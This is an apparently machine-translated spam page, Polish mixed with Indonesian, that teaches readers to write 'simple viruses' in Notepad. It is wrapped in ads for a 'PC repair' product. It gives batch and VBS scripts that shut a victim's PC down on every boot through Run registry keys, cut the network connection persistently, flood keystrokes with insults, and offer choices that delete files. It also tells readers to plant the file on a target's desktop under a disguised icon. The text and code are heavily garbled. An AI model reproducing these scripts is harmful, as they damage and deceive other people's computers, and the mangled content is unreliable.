You are currently viewing Rozwiązanie Dotyczące Notatnika Membuat Spyware Dengan

Rozwiązanie Dotyczące Notatnika Membuat Spyware Dengan

Jeśli dana osoba otrzyma błąd Membuat Spyware Dengan, dzisiejszy artykuł jest tutaj, aby Ci pomóc.

Szybka i łatwa naprawa komputera

  • 1. Pobierz i zainstaluj ASR Pro
  • 2. Otwórz program i kliknij „Skanuj”
  • 3. Kliknij „Napraw”, aby rozpocząć proces naprawy
  • Ciesz się szybszym

    Siapa sih yang tidak takut dengan seed laptop czy infekcja komputerowa? wirus komputerowy terkena, maka besar kemungkinan komputer kamu jadi tidak bisa digunakan. Apalagi jika komputer kamu kena salah satu z 20 komputerów przenośnych berbahaya dunia di.Tamat sudah, antara harus beli komputer baru atau fit ulang.

    Di balik seramnya serangan wirus laptop, maka berikan jalantikus kamu kumpulan zestaw skryptów haker buat membuat technologia wirusów sederhana. Mau Biar Nggak? kelihatan pintar canoe nullr profesional gitu.simak 7 skrypt shhh membuat wirus sederhana dengan notatnik.

    7 Skrypt hackowania wirusa Sederhana dla wirusa Membuat

    Sudah tahu wirus komputer itu berbahaya, kok JalanTikus bagikan cara membuat virusnya sih? Ya karena system antywirusowy yang JalanTikus bagikan ini kuma berisi kawałek oprogramowania sederhana yang akan mengacaukan tanpa komputer merusak unit i membokorkan informacje yang American Dental Association di dalamnya. Jadi Aman David Kokok Untuk digunakan komputerowe menjahili teman kamu.

    1. Przystanek Membuat

    Wirus komputerowy wirus systemowy kerja bug komputer sederhana ini adalah dengan memaksa komputer teman atau przeznaczony jadi Zamknij. Untuk melakukannya, silakan buka Notatnik, serta skopiuj kod wklej bawah di. Lalu save file-nya nazwa dengan ForceShutdown.bat typ certyfikatu file-nya File all.

    @Echo wyłączonewiadomość o numerze . ja nie tylko jak tyshutdown -c "Błąd! Komputer mógł się wyłączyć!" -Z

    Szybka i łatwa naprawa komputera

    Czy Twój komputer działa trochę wolniej niż kiedyś? Może pojawia się coraz więcej wyskakujących okienek lub połączenie internetowe wydaje się nieco niestabilne. Nie martw się, jest rozwiązanie! ASR Pro to rewolucyjne nowe oprogramowanie, które pomaga rozwiązać wszystkie nieznośne problemy z systemem Windows za pomocą jednego kliknięcia. Dzięki ASR Pro Twój komputer będzie działał jak nowy w mgnieniu oka!

  • 1. Pobierz i zainstaluj ASR Pro
  • 2. Otwórz program i kliknij „Skanuj”
  • 3. Kliknij „Napraw”, aby rozpocząć proces naprawy

  • Untuk mengaktifkan anty-malware ini, kamu harus klikaj tylko wiele plików kali pada-nya. Maca, Otomatis secara virusini akan berjalan.

    2. Przystanek Paksa Setiap Kali Dengan Dinyalakan

    berbeda sebelumnya trojan, wirus sederhana yang ini akan memaksa komputer teman kamu untuk off setiap kali dinyalakan. Ayts, jangan asal gunakan viral ini kalo siap gak tangung akibatnya ya!

    echo @echo off>c:windowshartell.batecho-dump>>c:windowshartell.batecho -r zamknij -t 88 -f>>c:windowshartell.batecho end>>c:windowshartell.batreg utworzyć hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI Reg_sz /t /d c:windowshartell.bat /freg dodaj hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz C:windowshartell /d.bat /fecho Zostałeś kiedyś zhakowany.PAUZA

    Simpan zgłasza buatan kamu atas di dengan nama hampi semua. Jangan lupa ekstensi gunakan .beat cię! Kliknij „Wyłącz mniej aktywne”.

    3. Mematikan Internet Secara Permanent

    Czytaj dalej online, słuchaj, co robisz American Dental Assoc. Pobierz Orang Yang Malach? Bikin im Internet lemot karena transferu danych użytkowania berkurang cepat. Makanya, coba Internet matikan teman kamu menggunakan sederhana berikut, scenariusz choroby:

    echo @echo off>c:windowswimn32.batecho-blast >> c:windowswimn32.batecho ipconfig/release_all>>c:windowswimn32.batecho end >> c:windowswimn32.batreg przenieść hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI Reg_sz /t /d c:windowswimn32.bat /freg dodaj hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t /d reg_sz c:windowswimn32.bat /fecho Zostałeś zhackowany!PAUZA

    Sepertibias, simpandengan nama hampir wszystkie gunakan john ekstensi.bat. Lalu klik buat mengaktifkannya!

    4. Duże litery

    Siapa yang tidak kesal jika Amerykańskie Stowarzyszenie Stomatologiczne alias ngetik isinya huruf besar semua? Orang Yang minerima dengan huruf besar wszystkie jelas akan terganggu, merasa atau bahkan marah. Makanya, yuk isengin kamu dengan membuat Caps tomboll Lock-nya nyala terus menggunakan skrypt wirusa sederhana berikut:

    Skopiuj, a następnie wklej kod ze wszystkich plików do notatnika, po prostu zostaw to poleceniem ForceCapsLock.vbs i nowym typem pliku nya All File. Naciśnij 2 kali buat mulai mengaktifkan sederhana elektroniczny wirus komputerowy ini.

    5. WirusAlai

    Siapa dostarcza cuma anak muda kekinian doang yang bisa alay? Komputer kamu juga bisa alay loh kalo patogen terinspeksi wyłącznik zasilania alay. Nie, Buat Membuat Virus Computer Jan Akan Membuat Klawiatura PC Jadi Alai, Kamu Bisa Gunakan Software Sama, Bericut:

    Skopiuj Caranya i kod rabatowy na substancję do notatnika. Zapisz plik raz ForceAlay.vbs i zapisz cały plik.

    6. Wirus Orang Jelek

    membuat spyware z notatnikiem

    Dikatain itu jelek emang nyebelin. Kalo kuma sekali dua kali sih harushna masih bisa ditahan, tapi kalo terus-terusan ngatai gimana jelek koba? Nie, dengan kode di bawah ini, kamu bisa membuat sebuah antywirus komputer przenośny sederhana yang akan memaksa komputer kieruje się w stronę untuk mengeluarkan ostrożny bahwa ‘dia jelek’ tanpa heti.

    Ustaw wshShell znaczeniewscript.CreateObject(“WScript.Shell”)Robićwscript.sen 100wshshell.sendkeys “Komputer Muka Lu Jelek Kayak Lou“wstążka

    Skopiuj i wklej skrypt sederhana di ke atas Notatnik. Och ia, kamu bisa bagian ganti varna merah dengan kata-kata sesuay selera, sklep lalu dengan nama VirusOrangJelek.vbs.

    7. Wirus quizu

    Semua orang suka kuis calo apalagi Berhadiah. Tapi kamu bakal kesal deh pasti setiap kalo kali mau buka komputer, ternyata yang nongol adalah kuis. Tak, mogę? Buat kamu yang mau isengin docelowy komputer przenośny z kuis-kuis menyebalkan, pakiet coba kamu gunakan berikut:

    @Echo wyłączoneNazywa się Kuis hari ini!:MenuklasyfikowaćEcho Jika kamu kena hsv apa yang kamu pilih lakukan?ZłamaćEcho związane z Yang Mang:echo 1. Poranny komputerEcho po drugie. format ajaEcho 3. NangisEcho 4. Pasek komputerowy BeliEnter = nie dołączaj niczegoustaw /p wejście=wybierz:jeśli %input%==1 -h zakończ -ttrzydzieścijeśli %input%==2 usuń c:xxxjeśli %input%==3 @ECHO jest teraz wyłączonemsg * mąka z galaretką Camuwiadomość 3 . Ngacha dulu gih!msg * Hayo widoki, procesor odczytuje gw acak-acak ya4. Posty Ouda, zainstaluj oolang ajamsg mau kelar kan [email protected] wyłączone:nadSTART %SystemRoot%system32notepad.exeWstawać

    Kopiuj jako wklej notatnik za pomocą ViruzQuiz nama.bat. Selesai, tinggal jalankan buat mengujinya.

    Agar berjalan lancar, coba simpan plik pc komputer sederhana yang kamu buat komputer di target. Lalu letakkan raport tersebut di pulpit, ikona john jangan lupa ubah